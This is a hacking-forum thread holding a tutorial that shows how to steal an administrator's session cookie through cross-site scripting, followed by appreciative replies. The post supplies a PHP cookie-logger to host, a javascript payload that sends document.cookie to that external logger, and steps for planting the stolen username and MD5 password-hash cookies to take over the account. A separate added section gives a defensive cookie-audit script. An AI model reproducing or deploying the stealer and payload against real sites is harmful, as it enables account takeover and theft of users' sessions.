Cookie Manipulation [Tutorial]

Keeper
11 years ago

1

![Image](http://i.imgur.com/yVqH6.jpg)

## **About**

In this tutorial, I'll go through the processes of exploiting/manipulating cookies. A cookie, also known as a browser cookie, is usually a small piece of data sent from a website and stored in a user's browser while the user is browsing that website. When the user visits the website again after closing it, he will still have an active session because of the information retrieved from the cookie.

## **Session Hijacking**

First of all, let's begin by explaining what session hijacking is. Basically, when a user registers at a website, his login credentials are stored in a database. Upon successfully supplying that information and its retrieval, the user gets logged in. That particular act of logging in and entering the account creates a session. Sessions keep users logged in throughout their whole browsing of the website. Sessions have a name, a value and a domain they work on. Each session has a unique value which could not normally be traced for different users. However, we could use cross-site scripting (XSS) to grab the user's session ID and MD5 hash value.

For the sake of this tutorial, we will use the following:

- Mozilla Firefox
- Firebug (add-on)
- Hosted PHP-based cookie stealer

Our goal is to steal the admin cookie which contains an active session. This could be done via cross-site scripting (XSS), so our vulnerability must be in the scope of the website we have as a target. We need to design a piece of code that would redirect the administrator, upon clicking it, to a page where our cookie stealer is located. Let's say we've found a vulnerable message system with a few input fields.

![Image](http://i.imgur.com/xekpz.jpg)

What we aim to do now is send a small forged Javascript code that contains a false link. But what exactly is the cookie stealer?

## **Cookie Stealer**

The cookie stealer plays the role of our cookie collector. Whenever our target visits the page with the cookie stealer, it will automatically log his cookies.

```php
<?php
$container = $HTTP_GET_VARS['cookie'];
$file = fopen('logger.txt', 'a');
fwrite($file, $container . "\n\n");
?>
```

Upload it to your server (I use 000webhost) with the .php extension, of course, either with an FTP client like FileZilla or the web-based one.

![Image](http://i.imgur.com/TP7e3.jpg)
![Image](http://i.imgur.com/QCGU9.jpg)

All that this small piece of code does is the following: with the **$container variable** we collect/store the cookie itself. The **$file variable** creates a file that will store the cookie information. And the **fwrite() function** saves the cookie to the file. The **\n** is used to make a line break; practically, it has the same function as the **`<br>` tag** in HTML.

Now all that is left is to forge the Javascript code that we are going to use to trick the admin into visiting our cookie stealer.

```javascript
javascript:void(window.location="www.[Censored].com/CookieLogger.php" + document.cookie)
```

The **void() function** in Javascript indicates that the link will open on the same page. **window.location** serves the role of the **`<a href>` tag** in HTML: redirecting. And **document.cookie** is the part where we grab the cookie from the user.

OK, say we've got the cookie logged successfully. We now need to change our session value to the one we've got.

![Image](http://i.imgur.com/u3ika.jpg)

```
strUsername=Administrator%40Account
strPassword=5b3de25c4dba50d2102281633d339b48
```

Now right-click and Edit the cookie. That way we'll get the last active session of the administrator.

![Image](http://i.imgur.com/I2gXw.jpg)

We will do the same thing with the password, but note that it's hashed in MD5.

**Notice:** Do NOT try cracking the hash and then placing its plaintext as the session value. It needs to be hashed in order to be parsed by the server.

![Image](http://i.imgur.com/UHRqz.jpg)

You can also set the session from within the URL bar. Delete the address and type:

```javascript
javascript:void(document.cookie="strUsername=Administrator%40Account")
```

Then the same process for the password:

```javascript
javascript:void(document.cookie="strPassword=5b3de25c4dba50d2102281633d339b48")
```

*That ends the tutorial. Hope you got something out of it. Thanks for reading!*
15 replies · 12 voices · 1,169 views
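From a defensive angle, the chain in the post works only because the session cookies are readable from page script (no HttpOnly), are sent without Secure, and carry a static value derived from the password rather than a random per-login identifier. The following is an added example, not part of Keeper's post or of any tool it mentions: a small Node.js audit that parses `Set-Cookie` header lines and flags exactly those properties. The sample headers are constructed, modelled on the strUsername/strPassword cookies shown above; the cookie-name heuristic and the PHPSESSID value are assumptions.

```javascript
// Added example (not from the original post): audit Set-Cookie header lines for the
// properties that make the tutorial's cookie theft possible. Sample data is constructed.

// Parse a single Set-Cookie header value into { name, value, attrs }.
// Attribute names are lower-cased; flag attributes (HttpOnly, Secure) map to true.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const [nameValue, ...attrParts] = parts;
  const eq = nameValue.indexOf('=');
  const name = eq === -1 ? nameValue : nameValue.slice(0, eq).trim();
  const value = eq === -1 ? '' : nameValue.slice(eq + 1).trim();
  const attrs = {};
  for (const attr of attrParts) {
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).trim().toLowerCase();
    attrs[key] = i === -1 ? true : attr.slice(i + 1).trim();
  }
  return { name, value, attrs };
}

// Heuristic (assumption): cookie names that usually carry authentication state.
const SESSION_NAME_RE = /sess|sid|auth|token|login|user|pass/i;

// Return the findings for one header; an empty list means nothing to report.
function auditCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!SESSION_NAME_RE.test(c.name)) return { name: c.name, findings };
  if (c.attrs.httponly !== true) {
    findings.push('missing HttpOnly: page script can read it via document.cookie, so any XSS can exfiltrate it');
  }
  if (c.attrs.secure !== true) {
    findings.push('missing Secure: sent over plain HTTP, visible to anyone on the path');
  }
  const sameSite = typeof c.attrs.samesite === 'string' ? c.attrs.samesite.toLowerCase() : '';
  if (sameSite === '' || sameSite === 'none') {
    findings.push('SameSite absent or None: attached to cross-site requests');
  }
  if (/^[0-9a-f]{32}$/i.test(c.value)) {
    findings.push('value is a 32-hex-digit string: looks like an MD5 digest, not a random per-login session id');
  }
  return { name: c.name, findings };
}

// Audit a list of headers and keep only cookies with findings.
function auditAll(headers) {
  return headers.map(auditCookie).filter((r) => r.findings.length > 0);
}

// Constructed sample headers: the two cookies from the tutorial, a hardened session
// cookie (the PHPSESSID value is a made-up placeholder), and a harmless preference cookie.
const SAMPLE_HEADERS = [
  'strUsername=Administrator%40Account; Path=/',
  'strPassword=5b3de25c4dba50d2102281633d339b48; Path=/',
  'PHPSESSID=placeholder0123456789abcdef; Path=/; HttpOnly; Secure; SameSite=Lax',
  'theme=dark; Path=/',
];

for (const result of auditAll(SAMPLE_HEADERS)) {
  console.log(`${result.name}:`);
  for (const f of result.findings) console.log(`  - ${f}`);
}
```

Run it with `node` and feed it the `Set-Cookie` lines from a login response. The strUsername cookie gets three findings (HttpOnly, Secure, SameSite) and strPassword a fourth for its MD5-shaped value; the hardened PHPSESSID cookie and the preference cookie produce none. HttpOnly alone would already stop `document.cookie` from returning the session cookies in the payload shown above.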
J [ColdIV]
11 years ago

0

Nice! I was searching for something like that just a few days ago. Thank you very much!

[HUNON]
11 years ago

0

This is a really useful tutorial and I enjoyed it very much.

Keeper
11 years ago | edited 11 years ago

0

Thanks. Those are all tutorials I've written and devoted to my group at Hackforums. I just repost them here so as to get the forum acquainted with these methods, since nobody else except me posts tutorials here.

Roun512 [roun512]
11 years ago

0

Nice tut and useful too, Keeper, and as I said, maybe someone will post something someday, and maybe it's soon. We appreciate your hard work.


0

Thanks a lot, Keeper :) Really good info and tut.


0

Thank you very much, Keeper, you're a wonderful master! hahaha

CygnusH33L
11 years ago

0

Nice tutorials, Keeper. I don't personally know where you find the time to do these :P Good work, I'll be giving them all a thorough read when I finish work :)

EEEEE
11 years ago

0

Wow, great tutorial, thanks :)

Keeper
11 years ago

0

> Nice tutorials Keeper, I don't personally know where you find the time to do these. Good work, I'll be giving them all a thorough read when I finish work.

Well, since some methods like LDAP injections are rare, I decided to post tutorials on them, and eventually to spread them from hackforums.net to here and other forums, so that people may learn something new apart from the casual SQLi and XSS.

Roun512 [roun512]
11 years ago

0

You are awesome, Keeper :)


0

So true, Keeper, I just heard about this way. But I also read your post more than once to understand it, because this is kind of new to me.

Aleks [Hashcode]
11 years ago

0

Thanks for this really nice share :) and helpful.

hornet4
11 years ago

0

Hi.
What if there is a GUID in the cookie instead of the user role and password?
And what if a GUID is created at the beginning of the session and disposed of at the end, or disposed of e.g. after 10 hours?
Excuse me, but I'm new to pentesting…
Thank you in advance.

Gninja
11 years ago

0

Nice tut @keeper

oxide
11 years ago

0

Very good, but I have a good one I saw somewhere that maybe you can incorporate into this. It is a way to steal all Firefox cookies. Can I add that here?
